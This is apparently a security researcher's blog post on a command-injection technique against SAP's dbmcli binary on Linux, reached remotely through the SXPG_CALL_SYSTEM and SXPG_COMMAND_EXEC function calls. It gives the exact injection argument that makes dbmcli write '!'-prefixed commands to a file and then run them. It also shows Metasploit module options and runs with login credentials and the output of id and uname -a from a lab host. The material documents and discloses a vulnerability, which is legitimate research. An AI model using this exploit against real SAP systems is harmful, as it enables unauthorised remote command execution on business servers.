The technique employed involves causing the executable to write attacker-controlled inputs to an attacker-controlled file. The executable is then used to read commands to execute from the same file. For example passing the following command line to the
dbmcli executable results in the creation of a file named pwned.txt in the /tmp folder.-o /tmp/pwned.txt –n pwnie\n!id\tfoo\n
The contents of the file are presented below.
Error! Connection failed to node pwnie
!id
for database (no dbname):
unknown host pwnie
!id
(see /etc/hosts
If the file is passed to the binary as illustrated in the command line below, then the commands prepended with an exclamation mark will be executed (in this case twice).
-ic /tmp/pwned.txt
The Remote Function Calls (RFCs) SXPG_CALL_SYSTEM and SXPG_COMMAND_EXEC can be used remotely to execute OS commands on SAP systems (as configured in transaction SM69). I previously blogged about this and the post can be found here. Authentication and relevant permissions are required.
On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands by injecting metacharacters; however on Linux they cannot – until now of course. By making use of the same exploit technique that Context IS did for the exploitation of the SAP Host Control vulnerability, we can execute arbitrary commands against Linux systems.
I have crafted several Metasploit modules to demonstrate this vector and the execution of the RFC SXPG_CALL_SYSTEM via the SOAP connector can be seen below.
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show optionsModule options (auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec):Name Current Setting Required Description ---- --------------- -------- ----------- CLIENT 001 yes Client CMD id yes Command to run OS Linux yes Windows/Linux PASS 06071992 yes Password Proxies no Use a proxy chain RHOSTS 172.16.252.150 yes SAP ICM server address RPORT 8042 yes SAP ICM server port number THREADS 1 yes The number of concurrent threads USER SAP* yes Username VHOST no HTTP server virtual hostmsf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request [*] 172.16.252.150:8042 - got response [*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request [*] 172.16.252.150:8042 - got response[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection ===============================================Output ------ ;!id uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completedmsf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > set CMD uname -a CMD => uname -a msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request [*] 172.16.252.150:8042 - got response [*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request [*] 172.16.252.150:8042 - got response[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection ===============================================Output ------ ;!uname -a Linux linux-gateway 2.6.32.43-0.4-default #1 SMP 2011-07-14 14:47:44 +0200 x86_64 x86_64 x86_64 GNU/Linux[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
The output below illustrates the execution of the RFC SXPG_CALL_SYSTEM from the module directly against the RFC connector.
msf auxiliary(sap_rfc_dbmcli_sxpg_call_system_command_exec) > run[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992 [+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992[SAP] Command Exec ==================Output ------>!id uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
These modules and many more will be released and submitted to the framework very soon. In the mean time you can download the modules to try from here:
No comments:
Post a Comment